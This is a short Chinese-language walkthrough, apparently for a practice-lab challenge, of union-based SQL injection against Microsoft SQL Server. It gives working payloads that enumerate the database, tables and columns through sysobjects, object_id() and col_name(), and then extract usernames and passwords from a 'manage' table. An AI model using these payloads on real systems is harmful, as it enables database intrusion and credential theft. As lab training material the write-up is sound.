1.判断注入类型(数字型) 2.判断字段数(4个) 3.判断回显(2和3) 这里要注意两个点 1.使用union all 2.字段三的位置是字符 4.爆库 (使用db_name()函数查询数据库) mozhe_db_v2 5.查看表名 xtype=‘u’ :查看用户表 mmsql和mysql语法有点不同,mmsql记录敏感信息的表在sysobjects 中 具体参数请了解以下链接了解: https://www.cnblogs.com/atree/p/SQL-Server-sysobjects.html https://blog.csdn.net/jackmacro/article/details/6405871 ?id=2 and 1=2 union all select 1,(select top 1 name from mozhe_db_v2.dbo.sysobjects where xtype=‘u’),‘3’,4 6.查看是否有其他表 ?id=2 and 1=2 union all select 1,(select top 1 name from mozhe_db_v2.dbo.sysobjects where xtype=‘u’ and name not in (‘manage’)),‘3’,4 继续看,发现没有其他表了 ?id=2 and 1=2 union all select 1,(select top 1 name from mozhe_db_v2.dbo.sysobjects where xtype=‘u’ and name not in (‘manage’,‘announcement’)),‘3’,4 7.查看字段名 ?id=2 and 1=2 union all select 1,(select top 1 col_name(object_id(‘manage’),1) from sysobjects),‘3’,4 object ():数据库中每个对象都有一个唯一的id值, object_id(name)可以根据表对象名称得到表对象的ID,object_id()只能返回用户创建的对像的ID,像以sys开头的表都是系统表所以返回不了的
col_name():可以根据id值得到对像的名称,而且可以返回指定下标的结果.
8.爆破,查看内容 ?id=2 and 1=2 union all select null,username, password ,null from manage 9.md5
|